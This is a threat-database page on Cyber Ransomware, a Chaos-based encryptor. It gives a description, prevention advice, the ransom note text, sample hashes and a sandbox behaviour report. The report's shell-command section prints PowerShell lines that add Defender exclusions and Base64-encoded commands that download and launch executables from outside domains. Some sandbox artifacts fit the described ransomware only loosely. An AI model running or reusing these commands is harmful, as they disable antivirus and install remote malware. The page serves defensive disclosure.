Multi-License Discount Quote
Threat Database Ransomware Cyber Ransomware

Cyber Ransomware

By Mezo in Ransomware
Translate To:

Threat Scorecard

Popularity Rank: 10,078
Threat Level: 100 % (High)
Infected Computers: 3,489
First Seen: October 15, 2021
Last Seen: November 12, 2025
OS(es) Affected: Windows

The malicious program named Cyber is malware from the ransomware type. Upon being executed on a breached system, it immediately initiates an encryption process for all the files on the device and appends their original filenames with a '.Cyber' extension. For instance, a file with an initial name of '1.doc' would now appear as '1.doc.Cyber' after being encrypted. Similarly, '2.pdf' would become '2.pdf.Cyber", and so on. Cybersecurity researchers point out that the Cyber Ransomware threat is based on the Chaos malware strain.

In addition to the file encryption, the Cyber Ransomware also changes the desktop wallpaper and generates a ransom note named 'read_it.txt.' The ransom note contains instructions for the victims, with the cybercriminals responsible for ransomware attacks usually demanding payment in exchange for the decryption key to unlock the encrypted files.

Cyber Ransomware Can Render Numerous Filetypes Inaccessible via Encryption

The ransomware note indicates that the victim's important files, such as databases, documents, and photos, have been encrypted and can only be decrypted by paying a ransom in Bitcoin cryptocurrency. The ransom amount is typically mentioned, and victims are given a way to test decryption on a limited number of files before they pay.

The note often contains contact information for the attackers or their representatives. However, sometimes the contact information may not be valid, and the victim may have difficulty communicating with the attackers. Additionally, the ransomware's wallpaper may display the same message and ransom amount but with different contact details.

In most ransomware attacks, decryption without the attackers' involvement is typically not possible. Even when victims pay the ransom, they may not receive the decryption keys or software necessary to recover their files. As a result, experts strongly advise against paying the ransom, even if the contact information is legitimate and the ransom amount seems affordable.

It is essential to remember that paying the ransom supports criminal activity and does not guarantee the recovery of the encrypted data. Victims should explore other options, such as restoring files from backups or seeking assistance from security experts.

Make Sure To Protect Your Devices and Data from Threats Like Cyber Ransomware

The best measures that users can implement to protect their devices and data from ransomware attacks involve a combination of proactive and reactive strategies.

First, users should be vigilant in their online activity and take steps to avoid falling victim to common ransomware infection vectors, such as phishing emails or malicious downloads. This includes using strong and unique passwords, regularly updating software and operating systems, and being cautious of suspicious emails or links.

Second, users should implement security measures, such as using reputable anti-malware software and enabling firewalls to block unauthorized access to their devices. They should also consider using endpoint detection and response (EDR) tools, which can help detect and respond to ransomware attacks in real time.

Third, users should regularly back up their important data to an external source, such as a cloud service or an external hard drive. This can help ensure that even if their device is infected with ransomware, they can still access their data without paying the ransom.

Fourth, in the event of a ransomware attack, users should avoid paying the ransom as it may not guarantee the safe recovery of their data and may also encourage further criminal activity. Instead, they should seek professional help from security experts and consider reporting the attack to law enforcement.

Finally, users should stay informed about the latest ransomware threats and evolving attack techniques to remain aware and prepared to protect themselves against potential attacks.

The full text of the ransom note dropped by Cyber Ransomware is:

Don't worry, you can return all your files!

All your files like documents, photos, databases and other important are encrypted

What guarantees do we give to you?

You can send 3 of your encrypted files and we decrypt it for free.

You must follow these steps To decrypt your files :   

1) Write on our e-mail :test@test.com ( In case of no answer in 24 hours check your spam folder

or write us to this e-mail: test2@test.com)

2) Obtain Bitcoin (You have to pay for decryption in Bitcoins.

After payment we will send you the tool that will decrypt all your files.)

Cyber Ransomware Video

Tip: Turn your sound ON and watch the video in Full Screen mode.

Analysis Report

General information

Family Name: Cyber Ransomware
Signature status: No Signature

Known Samples

MD5: 6ae50bdc7246401c666cd7e1b200d87a
SHA1: ec759c5df1845d1109fe2518380233ae1854850f
File Size: 1.84 MB, 1839616 bytes
MD5: 92a4a3aa4b40e95e8ca1d015c048246b
SHA1: 443a688cc83423c7511d56b626f85a392e798ac1
File Size: 5.12 KB, 5120 bytes
MD5: 969c9e50187024581e8943a2d8ed9d2d
SHA1: 57cec27d4e6c7714265cad52f7fd9cf58f68bb82
SHA256: C78A44442518C4EC39EF4E85C331C5CDD25C92FC92A80010C6F6DC3F59B1C42D
File Size: 4.61 KB, 4608 bytes
MD5: d1657a06fd2a757c43372f77ed433f30
SHA1: 48d0f17e206fdcff74121783989c90117ee411f4
SHA256: 0AFC88FC7DD731CF7D5884C415D5A27DC4FB39EB54DC890257AFEA947FC05725
File Size: 4.54 MB, 4536320 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have debug information
  • File doesn't have exports table
  • File doesn't have relocations information
  • File doesn't have security information
  • File is 32-bit executable
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
  • File is not packed
Show More
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

File Traits

  • HighEntropy
  • No Version Info
  • x86

Block Information

Total Blocks: 8
Potentially Malicious Blocks: 7
Whitelisted Blocks: 1
Unknown Blocks: 0

Visual Map

x x x x x x x 0
0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

  • ClipBanker.VA
  • ClipBanker.VB

Files Modified

File Attributes
\device\namedpipe\pshost.133968239486036860.2548.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.133973844142271624.5256.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134074942406200962.1348.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
c:\users\user\appdata\local\cheat.dll Generic Write,Read Attributes
c:\users\user\appdata\local\launcher.exe Generic Write,Read Attributes
c:\users\user\appdata\local\launcher.ini Generic Write,Read Attributes
c:\users\user\appdata\local\microsoft\windows\explorer\iconcache_16.db Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\explorer\iconcache_idx.db Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\__psscriptpolicytest_0zdqbhap.r32.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_24snuqhq.oyp.ps1 Generic Write,Read Attributes
Show More
c:\users\user\appdata\local\temp\__psscriptpolicytest_al3g5ul4.lob.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_aocz5vmr.rla.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_dv4pkhv1.qlu.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_iqv5olmb.tfb.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_ruwcjycv.ppp.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_ux1vmtfo.12w.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\album_td_3-8-0_activation.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\father.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\father.bat Synchronize,Write Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\modular.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\modular.bat Synchronize,Write Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\modular.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\modular.ps1 Synchronize,Write Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\tmp4351$.tmp Generic Write,Read Attributes,Delete
c:\users\user\appdata\local\temp\ttrj.exe Generic Write,Read Attributes
c:\users\user\deployment_test.exe Generic Write,Read Attributes

Registry Modifications

Key::Value Data API Name
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 넜泝Ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
Show More
HKLM\software\microsoft\windows\currentversion\runonce::wextract_cleanup0 rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Vebexpvr\AppData\Local\Temp\IXP000.TMP\" RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe ᭖洢Ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 洧Ǜ RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer\comdlg32\firstfolder::0 C:\Users\Vebexpvr\AppData\Local\Launcher.exeC:\Users\Vebexpvr\AppData\Local RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer\comdlg32\firstfolder::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots  RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots  RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots  RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0::1 Z1敖敢灸牶B 뻯.Vebexpvr RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1::0 V1嫬齤灡摰瑡a@ 뻯啮坤嫬齤.穗붽æappdata RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0::0 P1嫬齤潬慣l< 뻯嫬齤嫬齥.穘ˑQlocal RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0\0::nodeslot „ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0\0::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bags\132\shell::sniffedfoldertype Generic RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex ￿￿ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 椓嵌Ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ﻒ⍮味ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 㴠ȁ龡^8獖} RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey

Windows API Usage

Category API
Process Manipulation Evasion
  • NtUnmapViewOfSection
Process Shell Execute
  • CreateProcess
  • ShellExecute
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAccessCheckByType
  • ntdll.dll!NtAddAtomEx
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAllocateLocallyUniqueId
  • ntdll.dll!NtAlpcAcceptConnectPort
  • ntdll.dll!NtAlpcConnectPort
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcCreatePort
  • ntdll.dll!NtAlpcCreatePortSection
Show More
  • ntdll.dll!NtAlpcCreateSectionView
  • ntdll.dll!NtAlpcCreateSecurityContext
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtAlpcSetInformation
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtAssociateWaitCompletionPacket
  • ntdll.dll!NtCancelWaitCompletionPacket
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtCompareSigningLevels
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
  • ntdll.dll!NtCreateIoCompletion
  • ntdll.dll!NtCreateKey
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreatePrivateNamespace
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtCreateTimer
  • ntdll.dll!NtCreateTimer2
  • ntdll.dll!NtCreateWaitCompletionPacket
  • ntdll.dll!NtCreateWorkerFactory
  • ntdll.dll!NtDelayExecution
  • ntdll.dll!NtDeleteValueKey
  • ntdll.dll!NtDeviceIoControlFile
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFindAtom
  • ntdll.dll!NtFlushProcessWriteBuffers
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtFsControlFile
  • ntdll.dll!NtGetCachedSigningLevel
  • ntdll.dll!NtGetNlsSectionPtr
  • ntdll.dll!NtImpersonateAnonymousToken
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtNotifyChangeKey
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenMutant
  • ntdll.dll!NtOpenProcess
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenSymbolicLinkObject
  • ntdll.dll!NtOpenThread
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryDefaultLocale
  • ntdll.dll!NtQueryDirectoryFile
  • ntdll.dll!NtQueryDirectoryFileEx
  • ntdll.dll!NtQueryEvent
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationJobObject
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryObject
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySymbolicLinkObject
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQuerySystemInformationEx
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtReadFile
  • ntdll.dll!NtReadVirtualMemory
  • ntdll.dll!NtReleaseMutant
  • ntdll.dll!NtReleaseSemaphore
  • ntdll.dll!NtReleaseWorkerFactoryWorker
  • ntdll.dll!NtRequestWaitReplyPort
  • ntdll.dll!NtResumeThread
  • ntdll.dll!NtSetEvent
  • ntdll.dll!NtSetInformationFile

206 additional items are not displayed above.

Anti Debug
  • IsDebuggerPresent
  • NtQuerySystemInformation
User Data Access
  • GetUserDefaultLocaleName
  • GetUserName
  • GetUserNameEx
  • GetUserObjectInformation
Encryption Used
  • BCryptOpenAlgorithmProvider
Other Suspicious
  • AdjustTokenPrivileges

Shell Command Execution

open C:\Users\Vebexpvr\AppData\Local\Launcher.exe
open C:\Users\Vebexpvr\deployment_test.EXE
cmd.exe /c father.bat
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Start-Process -WindowStyle Hidden -FilePath powershell -Verb RunAs -ArgumentList '-NoProfile -Command Add-MpPreference -ExclusionPath \"C:\Users\Vebexpvr\*\"
open powershell -EncodedCommand "PAAjAHYAYQBwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGEAZABvAGIAZQAtAHAAbAB1AGcAaQBuAC4AaQBuAGYAbwAvAHkAYwAuAGUAeABlACcALAAgADwAIwBqAHMAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAZABzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAdAB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAYwAuAGUAeABlACcAKQApADwAIwBlAGEAdgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBhAGQAbwBiAGUALQBwAGwAdQBnAGkAbgAuAGkAbgBmAG8ALwB5AGMAdgAuAGUAeABlACcALAAgADwAIwBqAHEAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGIAcQB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGMAdABjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAYwB2AC4AZQB4AGUAJwApACkAPAAjAGkAZgBpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAZwBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAG0AZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB5AGMALgBlAHgAZQAnACkAPAAjAHYAcQBiACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGwAdABiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwByAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB5AGMAdgAuAGUAeABlACcAKQA8ACMAegB2AHQAIwA+AA=="
Show More
open powershell -EncodedCommand "PAAjAHQAegBsACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGEAZABvAGIAZQBoAGUAbABwAC4AbgBlAHQALwB3AGkAbgA4ADYALgBlAHgAZQAnACwAIAA8ACMAegBhAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAGwAZAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHMAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB3AGkAbgA4ADYALgBlAHgAZQAnACkAKQA8ACMAaAB6AHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgBjAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGgAcgB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHcAaQBuADgANgAuAGUAeABlACcAKQA8ACMAbgB2AG0AIwA+AA=="
open powershell -EncodedCommand "PAAjAGsAYwBwACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAcwBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAZABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAdABlACMAPgA="
open C:\Users\Qoceadrm\AppData\Local\Temp\Album_TD_3-8-0_Activation.exe
open C:\Users\Qoceadrm\AppData\Local\Temp\ttrj.exe

Related Posts

Trending

Most Viewed

Loading...